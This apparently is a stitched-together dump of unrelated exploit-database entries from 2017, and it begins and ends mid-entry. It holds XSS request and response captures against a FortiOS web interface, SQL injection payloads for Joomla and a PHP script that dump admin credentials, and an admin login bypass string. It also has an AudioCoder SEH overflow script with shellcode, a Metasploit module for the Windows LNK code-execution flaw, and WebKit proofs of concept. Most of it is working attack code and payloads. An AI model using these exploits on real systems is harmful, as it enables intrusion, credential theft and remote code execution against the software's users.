Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 12:07:47 GMT
Server: xxxxxxxx-xxxxx
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding
Content-Length: 6150
Connection: close
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-UA-Compatible: IE=Edge
(...)
<span class="fgd-app tooltip id_15832" onmouseover="alert('XSS')" x="y " data-address="undefined" data-dport="443" data-protocol="6"><a href="https://www.fortiguard.com/fos/15832" onclick="return false;" data-hasqtip="2"><span class="app_icon app15832" onmouseover="alert('XSS')" x="y"></span><label class="app_label" title="">15832" onmouseover=alert('XSS') x="y</label></a></span>
(...)
2. XSS in WEB UI - Assign Token:
URL:
https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E
Http request:
GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 13:39:17 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 13:39:17 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3485
(...)
<script type="text/javascript">
var ftokens = [];
var action = '</script><script>alert('XSS')</script><script>';
</script>
</head>
(...)
3. Stored XSS in WEB UI - Replacement Messages:
#1 - Http request:
POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Content-Length: 125
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close
csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A
#1 - Http response:
HTTP/1.1 302 FOUND
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
X-UA-Compatible: IE=Edge
Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/
Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0
#2 - Http request:
GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close
#2 - Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70940
(...)
<form id="replacemsg_form">
<div style='display:none'><input type='hidden' name='csrfmiddlewaretoken' value='d58f666c794024295cece8c5b8b6a3ff' /></div> <textarea id="buffer" name="buffer">ABC</textarea>
<script>alert('XSS')</script>
</textarea>
(...)
"Joomla Component ccnewsletter 2.1.9 - 'sbid' Parameter SQL Injection"
# Exploit Title: Joomla Component ccnewsletter 2.1.9 - SQL Injection
# Date: 07-26-2017
# Exploit Author: Shahab Shamsi
# Vendor Homepage: https://extensions.joomla.org/extension/ccnewsletter/
# Version: = 2.1.9 [Final Version]
# Tested on: Win,Linux
# Google Dork: inurl:"index.php?option=com_ccnewsletter" inurl:sbid
# Video Refrence: http://securityman.org/joomla-component-ccnewsletter-2-1-9-sql-injection/
Sqlmap:
sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs
Testing Method:
- boolean-based blind
- time-based blind
- UNION query
Parameter: sbid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
Type: AND/OR time-based blind
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
Source: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687
The attached program binary causes a buffer overflow in cplus-dem.c when it tries to demangle specially crafted function arguments in the binary. Both the buffer size as well as the buffer content are controlled from the binary.
objdump -x -C <file>
nm -C <file>
Tested on the following configurations
* 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 22:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* 4.1.12-boot2docker #1 SMP Tue Nov 3 06:03:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* Binutils versions: 2.20 and 2.26
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42386.zip
#!/usr/bin/python
# Exploit Title : AudioCoder 0.8.46 Local Buffer Overflow (SEH)
# CVE : CVE-2017-8870
# Exploit Author : Muhann4d @0xSecured
# Vendor Homepage : http://www.mediacoderhq.com
# Vulnerable Software: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=AudioCoder-0.8.46.exe
# Vulnerable Version : 0.8.46
# Fixed version : N/A
# Category : Local Buffer Overflow
# Tested on OS : Windows 7 Pro SP1 32bit
# How to : Open AudioCoder then drag & drop the .m3u file in it and then press the START button.
# Timeline :
# 2017-05-05: Vulnerability discovered, vendor has been contaced
# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version"
# 2017-05-09: A POC sent to the vendor. No reply since then.
# 2017-06-26: Exploit released.
print "AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured"
from struct import pack
junk = "http://" + "\x41" * 741
nseh = pack('<I',0x909006eb)
seh = pack('<I',0x66015926)
nops= "\x90" * 20
shell=("\xb8\x9d\x01\x15\xd1\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x32\x31\x42\x12\x03\x42\x12\x83\x77\xfd\xf7\x24\x7b\x16\x7e"
"\xc6\x83\xe7\xe1\x4e\x66\xd6\x33\x34\xe3\x4b\x84\x3e\xa1\x67"
"\x6f\x12\x51\xf3\x1d\xbb\x56\xb4\xa8\x9d\x59\x45\x1d\x22\x35"
"\x85\x3f\xde\x47\xda\x9f\xdf\x88\x2f\xe1\x18\xf4\xc0\xb3\xf1"
"\x73\x72\x24\x75\xc1\x4f\x45\x59\x4e\xef\x3d\xdc\x90\x84\xf7"
"\xdf\xc0\x35\x83\xa8\xf8\x3e\xcb\x08\xf9\x93\x0f\x74\xb0\x98"
"\xe4\x0e\x43\x49\x35\xee\x72\xb5\x9a\xd1\xbb\x38\xe2\x16\x7b"
"\xa3\x91\x6c\x78\x5e\xa2\xb6\x03\x84\x27\x2b\xa3\x4f\x9f\x8f"
"\x52\x83\x46\x5b\x58\x68\x0c\x03\x7c\x6f\xc1\x3f\x78\xe4\xe4"
"\xef\x09\xbe\xc2\x2b\x52\x64\x6a\x6d\x3e\xcb\x93\x6d\xe6\xb4"
"\x31\xe5\x04\xa0\x40\xa4\x42\x37\xc0\xd2\x2b\x37\xda\xdc\x1b"
"\x50\xeb\x57\xf4\x27\xf4\xbd\xb1\xd8\xbe\x9c\x93\x70\x67\x75"
"\xa6\x1c\x98\xa3\xe4\x18\x1b\x46\x94\xde\x03\x23\x91\x9b\x83"
"\xdf\xeb\xb4\x61\xe0\x58\xb4\xa3\x83\x3f\x26\x2f\x44")
#calc.exe
junkD = "D" * (2572 - (len(junk + nseh + seh + nops + shell)))
exploit = junk + nseh + seh + nops + shell + junkD
try:
file= open("Exploit.m3u",'w')
file.write(exploit)
file.close()
raw_input("\nExploit has been created!\n")
except:
print "There has been an Error"
Friends in War Make or Break 1.7 - Unauthenticated admin password change
Url: http://software.friendsinwar.com/
http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
<input type="text" name="password" value="ChangeMe">
<input type="text" name="submit" value="Edit+Password" hidden=true>
<input type="submit" value="Submit">
</form>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
attr_accessor :exploit_dll_name
def initialize(info = {})
super(update_info(info,
'Name' => 'LNK Remote Code Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
that contain a dynamic icon, loaded from a malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except in an additional SpecialFolderDataBlock is included. The folder ID set
in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
DLL file.
},
'Author' =>
[
'Uncredited', # vulnerability discovery
'Yorick Koster' # msf module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2017-8464'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
['URL', 'http://paper.seebug.org/357/'], # writeup
['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultTarget' => 0, # Default target is 64-bit
'DisclosureDate' => 'Jun 13 2017'))
register_advanced_options(
[
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
])
end
def exploit
dll = generate_payload_dll
dll_name = "#{rand_text_alpha(16)}.dll"
dll_path = store_file(dll, dll_name)
print_status("#{dll_path} created copy it to the root folder of the target USB drive")
# HACK the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead
'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|
lnk = generate_link("#{i}:\\#{dll_name}")
lnk_path = store_file(lnk, "#{rand_text_alpha(16)}_#{i}.lnk")
print_status("#{lnk_path} create, copy to the USB drive if drive letter is #{i}")
end
end
def generate_link(path)
path << "\x00"
display_name = "Flash Player\x00" # LNK Display Name
comment = "\x00"
# Control Panel Applet ItemID with our DLL
cpl_applet = [
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
].pack('C*')
cpl_applet << [path.length].pack('v')
cpl_applet << [display_name.length].pack('v')
cpl_applet << path.unpack('C*').pack('v*')
cpl_applet << display_name.unpack('C*').pack('v*')
cpl_applet << comment.unpack('C*').pack('v*')
# LinkHeader
ret = [
0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
0x00, 0x00, 0x00, 0x00, # FileAttributes
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
0x00, 0x00, 0x00, 0x00, # FileSize
0x00, 0x00, 0x00, 0x00, # IconIndex
0x00, 0x00, 0x00, 0x00, # ShowCommand
0x00, 0x00, # HotKey
0x00, 0x00, # Reserved1
0x00, 0x00, 0x00, 0x00, # Reserved2
0x00, 0x00, 0x00, 0x00 # Reserved3
].pack('C*')
# IDList
idlist_data = ''
idlist_data << [0x12 + 2].pack('v') # ItemIDSize
idlist_data << [
# This PC
0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
idlist_data << [0x12 + 2].pack('v') # ItemIDSize
idlist_data << [
# All Control Panel Items
0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
idlist_data << [cpl_applet.length + 2].pack('v')
idlist_data << cpl_applet
idlist_data << [0x00].pack('v') # TerminalID
# LinkTargetIDList
ret << [idlist_data.length].pack('v') # IDListSize
ret << idlist_data
# ExtraData
# SpecialFolderDataBlock
ret << [
0x10, 0x00, 0x00, 0x00, # BlockSize
0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList
].pack('C*')
# TerminalBlock
ret << [0x00, 0x00, 0x00, 0x00].pack('V')
ret
end
# Store the file in the MSF local directory (eg, /root/.msf4/local/)
def store_file(data, filename)
ltype = "exploit.fileformat.#{self.shortname}"
if ! ::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory)
end
if filename and not filename.empty?
if filename =~ /(.*)\.(.*)/
ext = $2
fname = $1
else
fname = filename
end
else
fname = "local_#{Time.now.utc.to_i}"
end
fname = ::File.split(fname).last
fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
fname << ".#{ext}"
path = File.join("#{Msf::Config.local_directory}/", fname)
full_path = ::File.expand_path(path)
File.open(full_path, "wb") { |fd| fd.write(data) }
full_path.dup
end
end
# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #
# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi
# Date: 2017-07-25
# Exploit Author: 8bitsec
# Vendor Homepage: http://adspro.scripteo.info/
# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010
# Version: 3.4
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-07-25
Product & Service Introduction:
===============================
Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can.
Technical Details & Description:
================================
Multiple Stored XSS vulnerabilities found.
Blind SQL Injection on bsa_pro_id parameter.
Proof of Concept (PoC):
=======================
Stored XSS:
On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed.
Blind SQL Injection:
Parameter: bsa_pro_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5)
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: Make or Break
[x] Script Version: 1.7
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
[x] Author: Anarchy Angel
[x] Mail: anarchy[dot]ang31@gmail[dot]com
[x] More info: https://aahideaway.blogspot.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit admin' or ''='-- for username
and it should give you access to the admin area. A quick release to
kick off DefCon festivities. See you there! Enjoy >:)
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1240
JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.
The PoC shows to call a setter of another origin's object.
PoC 1 - JSValue::putToPrimitive:
-->
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
let a = 1.2;
a.__proto__.__proto__ = f.contentWindow;
a['test'] = {toString: function () {
arguments.callee.caller.constructor('alert(location)')();
}};
};
f.src = 'data:text/html,' + `<iframe></iframe><script>
Object.prototype.__defineSetter__('test', v => {
'a' + v;
});
</scrip` + `t>`;
</script>
</body>
<!--
PoC 2 - JSObject::putInlineSlow:
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
let a = {
__proto__: f.contentWindow
};
a['test'] = {toString: function () {
arguments.callee.caller.constructor('alert(location)')();
}};
};
f.src = 'data:text/html,' + `<iframe></iframe><script>
Object.prototype.__defineSetter__('test', v => {
'a' + v;
});
</scrip` + `t>`;
</script>
</body>
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1241
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function freememory() {
var a;
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
function go() {
meter.textContent = "foo";
freememory();
}
function eventhandler() {
template.appendChild(table);
}
</script>
<body onload=go()>
<meter id="meter">
<shadow>
<template id="template">
</template>
<style onload="eventhandler()"></style>
<table id="table">
<iframe></iframe>
<svg>
<!--
=================================================================
ASan log:
=================================================================
==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8
READ of size 8 at 0x60c0000b7070 thread T0
==29516==WARNING: invalid path to external symbolizer!
==29516==WARNING: Failed to use and restart external symbolizer!
#0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)
#1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)
#2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)
#4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)
#5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)
#6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)
#7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)
#8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)
#9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)
